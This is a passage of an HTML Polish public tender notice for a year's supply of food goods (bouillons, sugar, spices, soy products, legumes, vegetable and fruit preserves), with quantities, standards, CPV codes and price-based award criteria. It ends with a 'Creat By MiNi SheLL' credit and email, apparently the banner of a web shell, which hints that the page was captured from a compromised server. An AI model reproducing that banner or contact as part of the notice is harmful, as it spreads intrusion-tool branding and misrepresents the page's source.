- zapach i smak - typowy dla kaszy mannej;
- bez obecności szkodników i innych pozostałości;	PN-88/A-74203	3 000 kg
6.	Ryż biały:
- opakowanie - 1 kg - 25 kg;		PN-A-74220	10 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.62.30.00-1, 15.85.11.00-2, 15.61.31.00-8, 15.61.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Buliony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu		Norma	Ilość
1.	Rosół jarzynowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-75980:1997	3 500 kg
2.	Rosół drobiowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-97052	2 500 kg
3.	Rosół grzybowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94050	10 kg
4.	Barszcz biały w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy	PN-A-94050:1996	400 kg
5.	Żurek w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94050	400 kg
6.	Przyprawa do zup w płynie - maggi:
- opakowanie - 1 l - 5 l;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94052	4 000 l
7.	Przyprawa jarzynka w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94050	1 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.20.00-7, 15.89.15.00-5, 15.89.14.00-4, 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu		Norma	Ilość
1.	Cukier biały kryształ:
- opakowanie max. do 25 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;	PN-A-74850	7 500 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne artykuły spożywcze i przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość
1.	Cukier waniliowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; BN-79-8133-01	80 kg
2.	Chrupki kukurydziane:
-opakowanie od 0,08 kg do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-88036:1998	250 kg
3.	Chilli w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86955	20 kg

4.	Curry w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-R-87022	20 kg

5.	Cynamon w proszku w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86955	10 kg

6.	Biszkopty:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-88115:1998	250 kg
7.	Budyń:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-94051	650 kg

8.	Czosnek granulowany:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86967	30 kg

9.	Galaretka niskosłodzona:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-94/A-75104	120 kg

10.	Herbata granulowana:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-ISO 3720	1 000 kg

11.	Kawa zbożowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-94013	2 500 kg

12.	Kisiel:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-94051	120 kg

13.	Kwasek cytrynowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-81/A-79734	50 kg

14.	Liść laurowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-R-87022	50 kg

15.	Majeranek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86958	50 kg

16.	Majonez:
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86950:1995	2 000 kg

17.	Musztarda;
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86964	3 000 kg
18.	Ocet 10% 0,5 l	PN-72/A-79733	1 400 l

19.	Papryka mielona ostra:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86955	60 kg

20.	Pieprz czarny mielony:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86965	180 kg
21.	Proszek do pieczenia:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-94017:1998	10 kg

22.	Przyprawa do mięsa mielonego:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	BN-67/8132-14	20 kg

23.	Sól kuchenna:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-C-84081	4 000 kg

24.	Ziele angielskie:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	BN-67/8132-14	50 kg

25.	Żelatyna spożywcza:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-82245:1993	100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.61.33.11-1, 15.87.12.00-6, 15.87.10.00-4, 15.62.00.00-0, 15.83.31.00-7, 15.86.30.00-5, 15.86.10.00-1, 15.89.00.00-3, 15.87.20.00-1, 15.87.12.73-8, 15.87.12.50-1, 15.87.10.00-4, 15.87.21.00-2, 15.89.90.00-6, 15.87.00.00-7, 15.87.24.00-5, 15.89.20.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty sojowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość

1.	Granulat sojowy:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-ISO 5506	700 kg

2.	Kostka sojowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-ISO 5506	500 kg

3.	Kotlety sojowe:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-ISO 5506	200 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty strączkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość
1.	Fasola JAŚ średni;
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-75/R-65031	4 500 kg
2.	Groch łuskany:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-74220:1997	3 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.30-7, 15.31.11.33-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	      	Norma	Ilość
1.	Chrzan tarty:
- opakowanie jednostkowe- słoiki do 0,9 l
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	 PN/R-75520	50 kg
2.	Fasolka konserwowa:
- op.2500- 3000 ml, długość ok. 5 cm, kolor zielony, bez łyka, zalewa klarowna;
- termin przydatności do spożycia min. 12 miesięcy od dostawy;    PN-V-74016:2001	200 kg
3.	Groszek konserwowy:
- op. 2500-3500 ml, kolor zielony, soczysty, ziarna całe, nie zepsute, bez obcych zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN-76/A-77803	1 200 kg
4.	Koncentrat pomidorowy 30%:
- opakowanie - puszka 4500g;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN-75/A-77601	7 500 kg
5.	Kukurydza konserwowa:
- op. 2500-3000 ml, ziarna młodej kukurydzy luzem w zalewie konserwującej, ziarna całe nieuszkodzone, zalewa barwy żółtawej i żółta, opalizująca lub mętna z osadem tkanki roślinnej na dnie opakowania, konsystencja miękka - wyrównana, smak i zapach - charakterystyczny dla kukurydzy bez obcych smaków i zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 		
PN-A-77807	800 kg
6.	Leczo pieczarkowe:
- produkt spożywczy otrzymany ze świeżych warzyw i grubo pokrojonych pieczarek z dodatkiem soli kuchennej, utrwalony przez pasteryzację;
- konsystencja - półpłynna do gęstej, z widocznymi kawałkami warzyw i pieczarek;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN-A-86951:2006	2 000kg
7.	Ogórki konserwowe całe:
- op.2500-4000 ml, termin przydatności do spożycia min. 12 miesięcy, produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalony przez pasteryzację w opakowaniu hermetycznie zamkniętym, struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie, powierzchnia ogórków wolna od uszkodzeń mechanicznych i plam chorobowych; PN-A-77801 	2 000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1, 15.33.14.64-7, 15.33.14.62-3, 15.33.14.27-6, 15.33.14.70-2, 15.33.11.35-2, 15.33.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przetwory owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Norma	Ilość
1.	Dżem:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;	PN-A-75100	50 kg
2.	Miód:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;	PN-88/A77626	50 kg
3.	Dżem:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy; 	PN-A-75100	6 500 kg
4.	Marmolada:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;	PN-93/A-75103	6 500 kg
5.	Kompot truskawkowy:
- słoik o pojemności 0,900 l - 1 l, wygląd -widoczne całe owoce, zalewa klarowna, ekstrakt ogólny nie mniej niż 20 %, smak i zapach smak słodki, charakterystyczny dla kompotu truskawkowego, minimalny termin przydatności do spożycia od dnia dostawy 6 miesięcy; PN-75/A-75953	800 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.90-3, 15.83.16.00-8, 15.33.22.30-5, 15.33.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Termin realizacji reklamacji - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com